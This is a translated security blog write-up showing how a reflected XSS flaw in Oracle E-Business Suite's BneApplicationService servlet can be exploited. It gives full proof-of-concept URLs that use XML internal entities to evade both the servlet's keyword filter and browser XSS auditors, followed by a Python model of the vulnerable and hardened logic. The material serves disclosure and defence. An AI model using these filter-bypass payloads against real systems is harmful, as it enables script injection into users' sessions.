Bypassing the Chrome and IE XSS Filters with XML Internal Entities

Web applications that perform XML processing on the back end are prone to XSS, and XML internal entities can be used to bypass the XSS filters of web browsers such as Chrome, IE and Safari.

Bypassing the XSS filters of common browsers

The BneApplicationService servlet in Oracle eBusiness Suite 12.x and earlier has a cross-site scripting vulnerability, which was found while looking for XML external entity injection flaws.

If we request the following URL:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=XXX

we get the following response:

The following error has occurred
Exception Name: oracle.apps.bne.exception.BneFatalException –
oracle.apps.bne.exception.BneFatalException: XML parse error in file at line 1, character 1.
Log File Bookmark: 392699

So we modify the request and wrap the value in an XML tag:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3CFOO%3EXXXXX%3C/FOO%3E

Now we get this response instead:

The following error has occurred
Exception Name: oracle.apps.bne.exception.BneFatalException – java.lang.ClassCastException:
oracle.xml.parser.v2.XMLText cannot be cast to oracle.xml.parser.v2.XMLElement
Log File Bookmark: 602808

To get past this we need to see what the class file contains. Looking at the decompiled source, we find the following in the createBodyBneStyle method:

import oracle.xml.parser.v2.XMLDocument;
import oracle.xml.parser.v2.XMLElement;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

// Decompiled excerpt of createBodyBneStyle. m_messagesXML holds the raw
// bne:messagexml request parameter; localStringBuffer collects the HTML response.
StringBuffer localStringBuffer = new StringBuffer();
XMLDocument localXMLDocument = BneXMLDomUtils.parseString(this.m_messagesXML);
// The document element is cast straight to XMLElement; a top-level text node
// with no wrapping tag is what produced the ClassCastException shown above.
XMLElement localXMLElement1 = (XMLElement) localXMLDocument.getDocumentElement();
NodeList localNodeList = localXMLElement1.getChildNodes();
for (int i = 0; i < localNodeList.getLength(); i++) {
    String str1 = "";   // bne:type
    String str2 = "";   // bne:text
    String str3 = "";   // bne:value
    String str4 = null; // bne:cause
    String str5 = null; // bne:action
    Node localNode = null;
    XMLElement localXMLElement2 = (XMLElement) localNodeList.item(i);
    NamedNodeMap localNamedNodeMap = localXMLElement2.getAttributes();
    localNode = localNamedNodeMap.getNamedItem("bne:type");
    if (localNode != null) {
        str1 = localNode.getNodeValue();
    }
    localNode = localNamedNodeMap.getNamedItem("bne:text");
    if (localNode != null) {
        str2 = localNode.getNodeValue();
    }
    localNode = localNamedNodeMap.getNamedItem("bne:value");
    if (localNode != null) {
        str3 = localNode.getNodeValue();
    }
    localNode = localNamedNodeMap.getNamedItem("bne:cause");
    if (localNode != null) {
        str4 = localNode.getNodeValue();
    }
    localNode = localNamedNodeMap.getNamedItem("bne:action");
    if (localNode != null) {
        str5 = localNode.getNodeValue();
    }
    // Attribute values are concatenated into HTML with no output encoding.
    // (str2 != "" is a reference comparison, as decompiled: a value read from
    // the document is never the same object as the literal, so it always passes.)
    if ((!str1.equalsIgnoreCase("DATA")) && (str2 != "")) {
        localStringBuffer.append("<p><b>" + str2 + "</b></p>");
        localStringBuffer.append("<p>" + str4 + "</p>");
    }
}

We can see that if bne:type is set to anything other than DATA, the bne:text value and the bne:cause value are passed back to the browser. This lets us build a query string that no longer triggers an XML parse error:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22GHIJKL%22%3E%3C/bne:a%3E%3C/message%3E


We can immediately see that this is very likely to be exploitable for XSS. Let's try a simple experiment: send <IMG SRC=/x onerror=alert(1)> and see what happens:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22%3CIMG%20SRC=/x%20onerror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

Reserved keyword <message> <bne:a xmlns:bne="foo" bne:text="ABCDEF" bne:cause="&lt; I … detected.

Press the back button and remove the reserved keyword. If the value cannot be modified, please contact your administrator.

Now we see that BneApplicationService has a built-in XSS filter, which we need to bypass. Recall that we were originally looking for an XXE vulnerability. After failing to bypass the XSS filter with external XML entities, I had the idea of using internal XML entities instead. They let us disguise the attack signature by writing it as separate placeholders that are only reassembled when the XML is parsed. First, let's see which characters are filtered, starting with &lt;:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20DWL%20%5B%3C%21ENTITY%20xxx%20%22%26lt;%22%3E%3C%21ENTITY%20yyy%20%22IMG%22%3E%3C%21ENTITY%20zzz%20%22SRC%22%3E%3C%21ENTITY%20ppp%20%22one%22%3E%5D%3E%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22%26xxx;%26yyy;%20%26zzz;=/x%20%26ppp;rror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E


This works. To bypass the built-in filter in BneApplicationService we only need an internal XML entity for the angle bracket. Below we add an internal entity xxx that maps to &lt;:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE DWL [<!ENTITY xxx "&lt;">]>

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22IMG%20SRC=/x%20onerror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

alert(1) does not execute, which is expected, because Chrome's XSS filter detected the attack code.
Now we need to bypass Chrome's XSS filter. Internal XML entities can do that too: we define entities for IMG, SRC and onerror. Because the XML parser reassembles them on the server, the attack code is hidden from Chrome, which no longer recognizes the response as reflected XSS.

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20DWL%20%5B%3C%21ENTITY%20xxx%20%22%26lt;%22%3E%3C%21ENTITY%20yyy%20%22IMG%22%3E%3C%21ENTITY%20zzz%20%22SRC%22%3E%3C%21ENTITY%20ppp%20%22one%22%3E%5D%3E%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22%26xxx;%26yyy;%20%26zzz;=/x%20%26ppp;rror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

Tested against: Firefox 47, Chrome 51, IE 11, Safari 9.1.1
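To show why the pre-parse keyword filter is not a fix and what is, here is an added model of the servlet's logic (written for this page, not Oracle's code): the raw parameter is scanned, the XML is parsed with entity expansion, and the parsed attribute values are concatenated into HTML exactly as createBodyBneStyle does. The denylist regex is an assumed stand-in for the "reserved keyword" check, the payload strings are constructed from the page's URLs, and the hardened version adds the two fixes a defender wants: refuse inline DTDs and HTML-encode at the output point.

```python
import html
import re
import xml.etree.ElementTree as ET

BNE = "{foo}"  # namespace URI bound by xmlns:bne="foo" in the page's payloads

# Constructed inputs modelled on the page's URLs, already URL-decoded.
LITERAL_PAYLOAD = (  # the literal "<IMG" is visible to a pre-parse filter
    '<message><bne:a xmlns:bne="foo" bne:text="ABCDEF" '
    'bne:cause="<IMG SRC=/x onerror=alert(1)>"></bne:a></message>'
)
ENTITY_PAYLOAD = (  # no "<IMG" anywhere in the raw parameter
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE DWL [<!ENTITY xxx "&lt;"><!ENTITY yyy "IMG">'
    '<!ENTITY zzz "SRC"><!ENTITY ppp "one">]>'
    '<message><bne:a xmlns:bne="foo" bne:text="ABCDEF" '
    'bne:cause="&xxx;&yyy; &zzz;=/x &ppp;rror=alert(1)>"></bne:a></message>'
)

# Assumed stand-in for the servlet's "reserved keyword" check: a denylist
# scan of the raw, unparsed parameter for dangerous opening tags.
RESERVED = re.compile(r"<\s*(img|script|iframe|svg)\b", re.IGNORECASE)

def reserved_keyword_detected(raw: str) -> bool:
    return RESERVED.search(raw) is not None

def bne_attributes(raw: str) -> tuple[str, str]:
    """Parse as createBodyBneStyle does and return (bne:text, bne:cause) of the
    first child element. The parser expands entity references here, so the
    returned strings can contain characters the raw parameter never had."""
    child = ET.fromstring(raw)[0]
    return child.get(BNE + "text", ""), child.get(BNE + "cause", "")

def render_vulnerable(raw: str) -> str:
    """Mirror of the decompiled logic: filter the raw bytes, then concatenate
    parsed attribute values into HTML without encoding."""
    if reserved_keyword_detected(raw):
        return "Reserved keyword detected."
    text, cause = bne_attributes(raw)
    return f"<p><b>{text}</b></p><p>{cause}</p>"

def render_hardened(raw: str) -> str:
    """Two fixes: refuse inline DTDs (so no entity expansion happens at all) and
    encode every parsed value at the point it enters the HTML response."""
    if "<!DOCTYPE" in raw:
        return "Rejected: inline DTD not allowed."
    text, cause = bne_attributes(raw)
    return f"<p><b>{html.escape(text)}</b></p><p>{html.escape(cause)}</p>"
```

Running render_vulnerable on both payloads shows the filter catching the literal form while the entity form is reassembled into a live IMG tag after parsing; render_hardened rejects the DTD outright and escapes anything that still reaches the response.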

[Original link:  translated and published by the mottoin editors]

Original article by Tank. If reprinting, please credit the source: http://www.mottoin.com/article/web/90739.html
